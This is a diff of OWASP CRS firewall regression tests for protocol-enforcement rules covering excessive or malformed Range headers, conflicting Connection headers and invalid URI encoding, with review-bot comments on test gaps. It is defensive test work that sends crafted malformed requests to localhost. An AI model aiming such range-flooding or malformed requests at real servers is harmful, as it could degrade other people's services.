test agent" - Host: "localhost" - Range: "bytes=1-10, 11-20, 21-30, 31-40, 41-50" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920200\"" - - test_title: 920200-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Range: "bytes=1-10, 11-20, 21-30, 31-40, 41-50" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: "id \"920200\"" + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Range: "bytes=-10,-, 21-30,31-40,41-50,51-500," - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920200\"" - - test_title: 920200-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Range: "bytes=-10,-, 21-30,31-40,41-50,51-500," + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log_contains: "id \"920200\"" + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Range: "bytes=1-,11-20, 21-30,31-40,41-50,51-500" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920200\"" - - test_title: 920200-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Range: "bytes=1-,11-20, 21-30,31-40,41-50,51-500" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log_contains: "id \"920200\"" + - test_id: 6 desc: 'Range: Too many fields (920200) from old modsec regressions' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Connection: close - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15 - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: id "920200" - - test_title: 920200-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Connection: close + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15 + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/" + version: "HTTP/1.1" + output: + log_contains: id "920200" + - test_id: 7 desc: This should PASS (PL2) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: bytes=10-11, 20-21, 30-31, 40-41, 50-51 - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.html" - version: "HTTP/1.1" - output: - no_log_contains: id "920200" - - test_title: 920200-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: bytes=10-11, 20-21, 30-31, 40-41, 50-51 + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.html" + version: "HTTP/1.1" + output: + no_log_contains: id "920200" + - test_id: 8 desc: "This should FAIL with rule 920200 (PL2)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.html" - version: "HTTP/1.1" - output: - log_contains: id "920200" - - test_title: 920200-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.html" + version: "HTTP/1.1" + output: + log_contains: id "920200" + - test_id: 9 desc: This should PASS (PL2) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.pdf" - version: "HTTP/1.1" - output: - no_log_contains: id "920200" - - test_title: 920200-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.pdf" + version: "HTTP/1.1" + output: + no_log_contains: id "920200" + - test_id: 10 desc: This should PASS (PL2) stages: - - stage: - input: - 
dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.pdf" - version: "HTTP/1.1" - output: - no_log_contains: id "920200" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.pdf" + version: "HTTP/1.1" + output: + no_log_contains: id "920200" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml index 5d9e663d9..46dd36bee 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml 
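Review bot: 920200 has no test with a percent-encoded file name, whereas 920201 and 920202 each pair their `.pdf` case with a `/get/index%2Epdf` variant; the PL2 exemption for `.pdf` is therefore untested against the encoded form here. A test 11 copying test 9 with `uri: "/get/index%2Epdf"` and the same `no_log_contains: id "920200"` keeps the three rules' exemption logic covered consistently. Tests 7, 9 and 10 all carry the desc "This should PASS (PL2)"; saying what differs (`desc: "PL2: 6 ranges on a .pdf must not match"`, `desc: "PL2: 34 ranges on a .pdf must not match"`) makes a failing run readable.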
@@ -1,41 +1,38 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920201.yaml" description: "Tests for 920201" +rule_id: 920201 tests: - - test_title: 920201-1 + - test_id: 1 desc: This should FAIL with rule 920201 (PL2) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341, 350-351, 360-361, 370-371, 380-381, 390-391, 400-401, 410-411, 420-421, 430-431, 440-441, 450-451, 460-461, 470-471, 480-481, 490-491, 500-501, 510-511, 520-521, 530-531, 540-541, 550-551, 560-561, 570-571, 580-581, 590-591, 600-601, 610-611, 620-621, 630-631" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.pdf" - version: "HTTP/1.1" - output: - log_contains: id "920201" - - test_title: 920201-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341, 350-351, 360-361, 370-371, 380-381, 390-391, 400-401, 410-411, 420-421, 430-431, 440-441, 450-451, 460-461, 470-471, 480-481, 490-491, 500-501, 510-511, 520-521, 530-531, 540-541, 550-551, 560-561, 570-571, 580-581, 590-591, 600-601, 610-611, 620-621, 630-631" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.pdf" + version: "HTTP/1.1" + output: + 
log_contains: id "920201" + - test_id: 2 desc: This should FAIL with rule 920201 (PL2), filename URI encoded stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341, 350-351, 360-361, 370-371, 380-381, 390-391, 400-401, 410-411, 420-421, 430-431, 440-441, 450-451, 460-461, 470-471, 480-481, 490-491, 500-501, 510-511, 520-521, 530-531, 540-541, 550-551, 560-561, 570-571, 580-581, 590-591, 600-601, 610-611, 620-621, 630-631" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index%2Epdf" - version: "HTTP/1.1" - output: - log_contains: id "920201" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341, 350-351, 360-361, 370-371, 380-381, 390-391, 400-401, 410-411, 420-421, 430-431, 440-441, 450-451, 460-461, 470-471, 480-481, 490-491, 500-501, 510-511, 520-521, 530-531, 540-541, 550-551, 560-561, 570-571, 580-581, 590-591, 600-601, 610-611, 620-621, 630-631" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index%2Epdf" + version: "HTTP/1.1" + output: + log_contains: id "920201" 
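Review bot: The Range value in both tests mixes in descending pairs such as `110-11`, `120-21` and `200-101`, the exact shape 920190's regression test uses to trigger "last byte less than first byte", so the payload fires more than one rule and the header is not a clean "too many ranges" sample. Using strictly ascending pairs (`100-101, 110-111, 120-121, …`) leaves the number of ranges as the only property under test. The same descending pairs appear in 920200's test 10; if they are intentional, a comment saying so will stop the next reader from "fixing" them.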
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml index e5c9c3be3..13647827f 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml 
@@ -1,41 +1,38 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920202.yaml" description: "Tests for 920202" +rule_id: 920202 tests: - - test_title: 920202-1 + - test_id: 1 desc: This should FAIL with rule 920202 (PL4) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.pdf" - version: "HTTP/1.1" - output: - log_contains: id "920202" - - test_title: 920202-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.pdf" + version: "HTTP/1.1" + output: + log_contains: id "920202" + - test_id: 2 desc: This should FAIL with rule 920202 (PL4), file name URI encoded stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index%2Epdf" - version: "HTTP/1.1" - output: - log_contains: id "920202" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index%2Epdf" + version: "HTTP/1.1" + output: + log_contains: id "920202" 
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml
index 4e7f952d6..b6d914fb9 100644
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml
@@ -1,122 +1,114 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920210.yaml" description: "Tests that trigger rule 920210" +rule_id: 920210 tests: - - test_title: 920210-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Connection: "keep-alive" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920210\"" - - test_title: 920210-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Connection: "keep-alive" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: "id \"920210\"" + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Connection: "keep-alive,keep-alive" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920210\"" - - test_title: 920210-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Connection: "keep-alive,keep-alive" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log_contains: "id \"920210\"" + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Connection: "keep-alive,close" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id 
\"920210\"" - - test_title: 920210-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Connection: "keep-alive,close" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log_contains: "id \"920210\"" + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Connection: "close,close" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920210\"" - - test_title: 920210-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Connection: "close,close" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log_contains: "id \"920210\"" + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Connection: "User-Agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920210\"" - - test_title: 920210-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Connection: "User-Agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: "id \"920210\"" + - test_id: 6 desc: Multiple/Conflicting Connection Header Data Found (920210) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Connection: keep-alive, keep-alive - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: id "920210" - - test_title: 920210-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Connection: keep-alive, keep-alive + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/" + version: "HTTP/1.1" + output: + log_contains: id "920210" + - test_id: 7 desc: Multiple/Conflicting Connection Header Data Found (920210) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Connection: close, close - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: id "920210" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Connection: close, close + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/" + version: "HTTP/1.1" + output: + log_contains: id "920210" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml index 1ef7bba65..39401c384 100644 
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml
@@ -1,129 +1,120 @@ --- meta: author: "csanders-git, Max Leske, azurit" - enabled: true - name: "920220.yaml" description: "Detect invalid URI encoding in the request URI" +rule_id: 920220 tests: - - test_title: 920220-1 + - test_id: 1 description: Detect invalid URI encoding in decoded URI (`%w20`) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get?x=%25w20" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920220\"" - - test_title: 920220-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get?x=%25w20" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920220\"" + - test_id: 2 description: Detect invalid URI encoding in decoded URI (`%1G`) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get?x=%251G" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920220\"" - - test_title: 920220-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get?x=%251G" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920220\"" + - test_id: 3 description: Do not trigger for valid URI encoding in decoded URI (`xyz zyx`) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "get/?x=xyz%20zyx" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920220\"" - - test_title: 920220-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "get/?x=xyz%20zyx" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: "id \"920220\"" + - test_id: 4 description: Do not trigger for spaces encoded as `+`, which is valid stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get?test=This+is+a+test" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920220\"" - - test_title: 920220-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get?test=This+is+a+test" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: "id \"920220\"" + - test_id: 5 description: | Detect incomplete URI encoding sequence (`bxy`, with crippled encoding of `b`). Note that the second character must not complete the `%6` to a valid sequence. 
stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get?parm=%6%78%79" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920220\"" - - test_title: 920220-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get?parm=%6%78%79" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920220\"" + - test_id: 6 description: Detect incomplete URI encoding sequence, single `%` (`bad%`) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get?parm=%62%61%64%" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920220\"" - - test_title: 920220-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get?parm=%62%61%64%" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920220\"" + - test_id: 7 description: Do not inspect file names for invalid URI encoding (`Taxes20%Done.txt`) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get/Taxes20%25Done.txt" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920220\"" - - test_title: 920220-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get/Taxes20%25Done.txt" + 
headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: "id \"920220\"" + - test_id: 8 description: Do not inspect file names for invalid URI encoding (`Taxes20%Done.txt`), with query stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get/Taxes20%25Done.txt?x%20y" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920220\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get/Taxes20%25Done.txt?x%20y" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: "id \"920220\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml index 54515ef4b..423422384 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml 
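Review bot: Test 3's `uri: "get/?x=xyz%20zyx"` has no leading slash, so the request line becomes `GET get/?x=xyz%20zyx HTTP/1.1`, which is not a valid origin-form target; a server that rejects it with a 400 before the rules run makes this `no_log_contains` check pass vacuously, proving nothing about rule 920220. Unless the runner normalizes the target, this should read `uri: "/get/?x=xyz%20zyx"`. Separately, this file (and 920221.yaml in the same patch) uses `description:` for the per-test text while 920202.yaml, 920210.yaml and 920250.yaml use `desc:`; if the runner's schema knows only one of the two keys, the other is silently dropped, so one key should be used across the suite.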
